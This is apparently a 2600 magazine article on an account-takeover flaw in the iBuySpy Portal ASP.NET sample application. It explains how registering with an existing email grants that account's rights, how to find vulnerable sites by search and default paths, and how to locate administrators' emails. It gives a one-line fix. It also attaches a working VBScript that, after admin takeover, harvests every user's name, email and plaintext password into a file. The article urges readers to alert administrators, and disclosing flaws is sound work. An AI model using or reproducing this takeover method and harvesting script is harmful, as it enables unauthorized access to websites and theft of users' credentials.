iBuySpy Portal Software

by Papa Doc

History

Sometime around January 2002, Micro$oft and Vertigo Software released a large ASP.NET sample application with source code called the iBuySpy Portal.

This was meant to be an example on how to build complete application solutions using ASP.NET.  See www.asp.net.

What is the iBuySpy Portal?

iBuySpy Portal is a framework for a web-based portal application.

If you are unfamiliar with iBuySpy, take a minute or two to look at the sample site (www.ibuyspyportal.com).  Since the release a lot of small businesses and individuals have started to run sites with the iBuySpy Portal framework.

The Main Problems

1.)  There is a major security bug in the registration system that can allow anyone to easily gain administrative access to the site.

2.)  User passwords are stored plain text.

The Security Hole

The security problem is in the user registration module (register.aspx).

If a user tries to register/create an account with an email address that is already in the database, the registration module will log the user on as the account belonging to the email address, regardless of the name, password, or other information supplied!

Some administrators have noticed this problem and secured the hole, most have not.  And since this is a fully functional sample application, many beginners download it and run it nearly as is.

Finding iBuySpy Sites

Besides the visual style clues, the easiest hint that a site is using iBuySpy is the file naming convention.

The default name for the main page is DesktopDefault.aspx and I have only found one or two sites out of hundreds that have changed this.  A quick [DesktopDefault.aspx] Google will yield thousands of results, not to mention the iBuySpy forums.

What is the Big Deal?

Well if it isn't already obvious, if the person registering to an unfixed site registers with the email address of an administrator, he/she is automatically logged on with full administrative rights.

The iBuySpy Portal has a powerful administrative menu which can add/edit/delete nearly every piece of content on the site, not to mention give access to the user database (which as I said before has plaintext passwords).

Another Problem

The administrator's password is normally right out in the open.  Especially on sites that aren't highly customized.

Miscellaneous

Some administrators running iBuySpy have decided to "disable" logins/user accounts so they remove the registration/logon/logoff links from the pages.

The sad thing is that I have found many of them neglect to delete the registration pages and only delete the links.  So as long as the location of the registration page can be determined, a user can still register and log on as admin.

The default registration page location is: http://www.example.com/Admin/Register.aspx

The admin's email address should not be hard to find.  It can normally be found on a "Contact" info page or on a discussion board.  If you look, you will find it.

Concluding Notes

As of the time this article was written, users who download iBuySpy Portal from www.asp.net will still be downloading an insecure application.

I find it disturbing that some administrators have found this problem and fixed it on their systems, yet Micro$oft still has an extremely insecure product (free or not) available to download... not to mention it is an incredibly easy fix (one line of code).

I just figured I'd share the information in case any of you ran iBuySpy or used sites that did.

If you find an insecure site, please email the administrator about the problem, along with the bug fix.  Readers of this magazine are always preaching about the bad name hackers get.  Well, I challenge you to practice what you preach and help admins, not take advantage of them.

The Fix

In the file: Admin/Register.aspx.vb

Find the line that calls the AddUser() function, and change it to this:

If accountSystem.AddUser(Name.Text, FName.Text, LName.Text, Reference.Text, Email.Text, Password.Text) } 0 Then

Also

I have also attached a VBScript that I wrote.

It isn't perfect code by any means.  It was whipped together just as an example.  It shouldn't be too hard to convert to Perl or whatever other scripting language you want.

To use this script, log onto an unfixed site with Internet Explorer as admin, configure the top six line of code, and run it.

The result will be a text file of usernames, emails, and passwords for all users on the site.

ibuyspy.vbs:

'*******************************
'*****      ibuyspy.vbs    *****
''******************************

fileName = "C:\test.txt"             ' The destination file name

rootURL = "http://www.somesite.com"  ' The URL before the DesktopDefault.aspx

adminTabIndex = "4"                  ' Once logged on, go to the Admin page and check
                                     ' for the "tabindex" and "tabid",
adminTabID = "6"                     ' they will be in the URL

url0 = "/DesktopDefault.aspx?"       ' Change this if the DesktopDefault.aspx
                                     ' has been renamed

url1 = "/Admin/ManageUsers.aspx?"    ' ditto

Set objBrowser = CreateObject("InternetExplorer.Application")

getUserList

Sub getUserList()
  Set fs = CreateObject("Scripting.FileSystemObject")
  Set a = fs.CreateTextFile(fileName, True)
  objBrowser.Navigate rootURL + url0 + "tabindex=" + adminTabIndex + "&tabid=" + adminTabID, False

  Do Until objBrowser.ReadyState = 4
  Loop

  Set Doc = objBrowser.Document
  theText = Doc.documentElement.outerHTML
  posA = InStr(1, theText, "allUsers")
  theText = Right(theText, Len(theText) - posA)
  posA = InStr(1, theText, "{/SELECT}")
  theText = Left(theText, posA)
  posA = InStr(1, theText, "{OPTION value=") + 14

  Do Until (posA - 14) = 0
    posB = InStr(posA, theText, "}") + 1
    posC = InStr(posB, theText, "{/OPTION}")
    userID = Mid(theText, posA, (posB - posA) - 1)
    userName = Mid(theText, posB, posC - posB)
    theText = Right(theText, Len(theText) - (posC + 9))
    a.WriteLine(userName + "," + getPass(rootURL + url1 + "userid=" + userID + "&username=" + userName + "&tabindex=" + adminTabIndex + "&tabid=" + adminTabID))
    posA = InStr(1, theText, "{OPTION value=") + 14
  Loop

  a.Close
  Set objBrowser = Nothing

End Sub

Function getPass(theURL)
  objBrowser.Navigate theURL

  Do Until objBrowser.ReadyState = 4
  Loop

  Set Doc = objBrowser.Document
  theText = Doc.documentElement.outerHTML
  posA = InStr(1, theText, "id=Email")

  If posA {} 0 Then
    posB = InStr(posA, theText, "value=") + 6
    posC = InStr(posB, theText, " ")

    rslt = Mid(theText, posB, posC - posB)

    posA = InStr(1, theText, "id=Password")
    posB = InStr(posA, theText, "value=") + 6
    posC = InStr(posB, theText, " ")

    rslt = rslt + "," + Mid(theText, posB, posC - posB)
  Else
    rslt = "ERROR"
  End If

  getPass = rslt

End Function

Code: ibuyspy.vbs
Return to $2600 Index